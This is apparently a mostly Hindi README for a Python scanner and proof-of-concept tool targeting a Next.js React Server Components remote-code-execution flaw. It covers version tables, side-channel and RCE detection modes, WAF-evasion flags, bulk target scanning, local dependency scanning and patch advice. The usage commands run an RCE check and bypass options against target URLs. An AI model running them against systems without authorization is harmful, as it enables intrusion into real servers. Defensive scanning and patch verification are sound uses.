
मल्टी-मोड भेद्यता स्कैनर Next.js RCE (CVE-2025-66478/55182) के लिए सुरक्षित साइड-चैनल डिटेक्शन, RCE proof-of-concept, WAF बाईपास तकनीक, और स्थानीय प्रोजेक्ट डिपेंडेंसी स्कैनिंग के साथ।
Next.js RSC रिमोट कोड निष्पादन भेद्यता के लिए सबसे व्यापक स्कैनर
╔════════════════════════════════════════════════════════════════════════╗
║ ____ _ ___ ____ _ _ _ ║
║ | _ \ ___ __ _ ___| |_|__ \/ ___|| |__ ___| | | ║
║ | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | | ║
║ | _ < __/ (_| | (__| |_ / /_ ___) | | | | __/ | | ║
║ |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_| ║
║ ║
║ React2Shell Ultimate CVE-2025-66478 Scanner v1.0.0 ║
║ Next.js RSC Remote Code Execution Vulnerability ║
╠════════════════════════════════════════════════════════════════════════╣
║ ║
║ ║
╠════════════════════════════════════════════════════════════════════════╣
║ Modes: --safe (side-channel) | --rce (PoC) | --version | --local ║
║ WAF Bypass: --waf-bypass | --vercel-bypass | --unicode ║
╚════════════════════════════════════════════════════════════════════════╝
CVE-2025-66478 (जिसे CVE-2025-55182 के नाम से भी जाना जाता है) एक गंभीर (CVSS 10.0) रिमोट कोड निष्पादन भेद्यता है जो React सर्वर घटकों (RSC) का उपयोग करने वाले Next.js अनुप्रयोगों को प्रभावित करती है।
| संस्करण श्रेणी | स्थिति |
|---|---|
| Next.js 15.0.0 - 15.0.4 | ⚠️ असुरक्षित |
| Next.js 15.1.0 - 15.1.8 | ⚠️ असुरक्षित |
| Next.js 15.2.0 - 15.2.5 | ⚠️ असुरक्षित |
| Next.js 15.3.0 - 15.3.5 | ⚠️ असुरक्षित |
| Next.js 15.4.0 - 15.4.7 | ⚠️ असुरक्षित |
| Next.js 15.5.0 - 15.5.6 | ⚠️ असुरक्षित |
| Next.js 16.0.0 - 16.0.6 | ⚠️ असुरक्षित |
| Next.js 14.3.0-canary.77+ | ⚠️ असुरक्षित |
| Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+ | ✅ पैच किया गया |
| Next.js 16.0.7+ | ✅ पैच किया गया |
| Next.js 13.x, 14.x स्थिर | ✅ प्रभावित नहीं |
यह टूल कई CVE-2025-66478 स्कैनर्स की सर्वश्रेष्ठ सुविधाओं को जोड़ता है:
| सुविधा | विवरण |
|---|---|
| 🔍 बहु-मोड पहचान | सुरक्षित साइड-चैनल, RCE PoC, केवल-संस्करण, स्थानीय स्कैनिंग |
| 🛡️ WAF बाईपास तकनीकें | जंक डेटा पैडिंग, यूनिकोड एन्कोडिंग, Vercel-विशिष्ट बाईपास |
| 📁 स्थानीय प्रोजेक्ट स्कैनिंग | पैकेज.जेसन, लॉकफ़ाइल्स को असुरक्षित निर्भरताओं के लिए स्कैन करें |
| ⚡ उच्च प्रदर्शन | कॉन्फ़िगरेबल समवर्तीता के साथ मल्टी-थ्रेडेड स्कैनिंग |
| 📊 एकाधिक आउटपुट प्रारूप | कंसोल, JSON, फ़ाइल निर्यात |
| 🎯 सटीक संस्करण पहचान | HTTP हेडर, RSC फिंगरप्रिंटिंग, पैच किए गए संस्करण की जागरूकता |
# Clone the repository
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate
# Install dependencies
pip install -r requirements.txt
# Or install manually
pip install requests tqdm
# Version detection only (fastest, no exploitation)
python3 react2shell-ultimate.py -u https://target.com --version
# Safe side-channel detection (no code execution)
python3 react2shell-ultimate.py -u https://target.com --safe
# RCE proof-of-concept (executes harmless calculation: 41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce
# Comprehensive scan with all bypass attempts
python3 react2shell-ultimate.py -u https://target.com --comprehensive
# Scan multiple targets from file
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json
# Quiet mode - only show vulnerable hosts
python3 react2shell-ultimate.py -l targets.txt -q
# JSON output to stdout
python3 react2shell-ultimate.py -l targets.txt --json
# Scan current directory
python3 react2shell-ultimate.py --local .
# Scan specific project path
python3 react2shell-ultimate.py --local /path/to/nextjs/projects
# Junk data bypass (adds 128KB padding to evade content inspection)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass
# Custom junk data size
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256
# Unicode encoding bypass
python3 react2shell-ultimate.py -u https://target.com --rce --unicode
# Vercel-specific WAF bypass
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass
# Windows target (PowerShell payload)
python3 react2shell-ultimate.py -u https://target.com --rce --windows
# With proxy
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080
# Custom headers
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"
# Increased timeout
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30
# Verbose output
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v
| विकल्प | विवरण |
|---|---|
-u, --url | स्कैन करने के लिए एकल URL |
-l, --list | URL वाली फ़ाइल (प्रति पंक्ति एक) |
--local | स्थानीय प्रोजेक्ट निर्देशिका स्कैन करें |
--safe | सुरक्षित साइड-चैनल पहचान (कोई RCE नहीं) |
--rce | RCE प्रूफ-ऑफ-कॉन्सेप्ट मोड |
--version | केवल संस्करण पहचान |
--comprehensive | सभी तकनीकों के साथ पूर्ण स्कैन |
--waf-bypass | WAF बाईपास के लिए जंक डेटा जोड़ें |
--waf-bypass-size | जंक डेटा आकार KB में (डिफ़ॉल्ट: 128) |
--unicode | WAF बाईपास के लिए यूनिकोड एन्कोडिंग |
--vercel-bypass | Vercel-विशिष्ट WAF बाईपास |
--windows | Windows PowerShell पेलोड का उपयोग करें |
-t, --threads | समवर्ती थ्रेड (डिफ़ॉल्ट: 10) |
--timeout | अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 10) |
-k, --insecure | SSL सत्यापन अक्षम करें |
--proxy | प्रॉक्सी URL (http://host:port) |
-H, --header | कस्टम हेडर (दोहराने योग्य) |
-o, --output | आउटपुट फ़ाइल (JSON) |
--all-results | सभी परिणाम सहेजें, केवल असुरक्षित नहीं |
-v, --verbose | विस्तृत आउटपुट |
-q, --quiet | केवल असुरक्षित होस्ट दिखाएं |
--json | stdout पर JSON आउटपुट |
--no-color | रंगीन आउटपुट अक्षम करें |
--safe)कोई भी कोड निष्पादित किए बिना एक विशिष्ट त्रुटि प्रतिक्रिया पैटर्न ट्रिगर करता है। त्रुटि हैंडलिंग व्यवहार के माध्यम से असुरक्षित RSC कार्यान्वयन की पहचान करता है।
--rce)RCE क्षमता की पुष्टि करने के लिए एक हानिरहित गणितीय गणना (echo $((41*271)) = 11111) निष्पादित करता है। परिणाम X-Action-Redirect हेडर में दिखाई देता है।
--version)X-Powered-By हेडर में Next.js संस्करण की जाँच करता हैVary हेडर का विश्लेषण करता हैtext/x-component प्रतिक्रियाओं के लिए RSC एंडपॉइंट जाँचता है--local)प्रोजेक्ट निर्देशिकाओं को स्कैन करता है:
package.json - प्रत्यक्ष निर्भरता घोषणाpackage-lock.json - NPM लॉकफ़ाइलyarn.lock - Yarn लॉकफ़ाइलpnpm-lock.yaml - PNPM लॉकफ़ाइलbun.lockb - Bun लॉकफ़ाइल[VULNERABLE] https://target.com
Version: 15.3.1 | Status: 200 | Method: rce_poc
WAF Bypass: SUCCESS
[NOT VULNERABLE] https://safe-target.com
Version: 15.5.7 | Status: 200 | Method: http_headers
[WAF BLOCKED] https://protected.com
Version: 15.2.0 | Status: 403 | Method: rce_poc
WAF Detected: Exploit blocked
{
"tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
"version": "1.0.0",
"cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
"scan_time": "2025-12-06T12:00:00Z",
"total_results": 1,
"results": [
{
"url": "https://target.com",
"vulnerable": true,
"version": "15.3.1",
"status_code": 200,
"detection_method": "rce_poc",
"waf_detected": false,
"waf_bypassed": false
}
]
}
यदि आपको असुरक्षित अनुप्रयोग मिलते हैं:
तुरंत अपग्रेड करें पैच किए गए संस्करणों में:
अस्थायी शमन उपाय:
निगरानी करें लॉग में शोषण प्रयासों के लिए
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।
⭐ इस रिपॉजिटरी को स्टार करें यदि आपको यह उपयोगी लगे! ⭐